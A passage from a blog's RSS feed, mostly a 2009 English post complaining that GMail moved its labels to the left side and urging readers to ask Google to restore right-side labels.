</description><pubDate>Wed, 08 Jul 2009 20:50:23 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/08/2-firewalle-prosze-jeden-na-mozg-drugi-na-serce/</guid><category>IT</category><category>przekręty</category><category>security</category><category>życie</category><category>implant</category><category>medycyna</category><category>hacking</category><category>zwrotnica</category><category>podczerwień</category></item><item><title>GMail - Right Side Labels</title><link>http://blog.konieczny.be/2009/07/02/gmail-right-side-labels/</link><description>&lt;p&gt;I'm so annoyed by this! Yesterday, Google changed GMail's look &amp;amp; feel — now we are forced to have our &lt;b&gt;labels on the left side&lt;/b&gt;... Argh!!! And this is completely non-functional if you have more than just a few of them!&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/7738484/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7738484_b3a80533ce.jpg&quot; width=&quot;500&quot; height=&quot;217&quot; alt=&quot;GMail Right side labels&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
I used labels (together with &quot;skip-the-inbox&quot; filtering) to keep the inbox clean and automatically move my mail under a proper label (=folder). Because I use more than 20 labels, &lt;b&gt;it is now VERY frustrating&lt;/b&gt; to scroll up and down all the time, just to check for new messages :-(&lt;br&gt;
&lt;br&gt;
So, there you have it Google, left side of our screens is clogged now, and right side is empty. Moreover, GMail's Drag &amp;amp; Drop Lab feature doesn't work with Google Calendar / Google Docs gadgets, and &quot;Labels on the right side&quot; extension disappeared completely. GMail is not functional or flexible anymore...&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Want Right Side Labels?&lt;/h3&gt;
&lt;p&gt;If you want Google to &lt;b&gt;bring back the right side labels&lt;/b&gt; or allow us to drag Google Calendar / Docs gadgets to the right side of the screen, &lt;a href=&quot;http://www.google.com/support/forum/p/gmail/thread?tid=5865649ae329f3f1&quot;&gt;post your comment in their Help Forum&lt;/a&gt; (&quot;I agree&quot; is enough).&lt;/p&gt;
&lt;p&gt;&lt;b&gt;(3/06/2009) EDITED TO ADD&lt;/b&gt;:&lt;br&gt;
Google put up a &lt;a href=&quot;http://mail.google.com/support/bin/answer.py?answer=118708&quot;&gt;help page&lt;/a&gt; for new labels, as well as a &lt;a href=&quot;http://spreadsheets.google.com/viewform?formkey=cjFLZmdPbnl3QnZlV0oxOHlWRmVGTXc6MA&quot;&gt;questionnaire&lt;/a&gt; — now you can say, how much you (dis)like new labels and describe why. &lt;a href=&quot;http://spreadsheets.google.com/viewform?formkey=cjFLZmdPbnl3QnZlV0oxOHlWRmVGTXc6MA&quot;&gt;Do it now&lt;/a&gt;!&lt;/p&gt;
</description><pubDate>Thu, 02 Jul 2009 09:30:39 +0200</pubDate><guid>http://blog.konieczny.be/2009/07/02/gmail-right-side-labels/</guid><category>English</category><category>google</category><category>IT</category><category>GMail</category><category>Labels</category></item></channel></rss>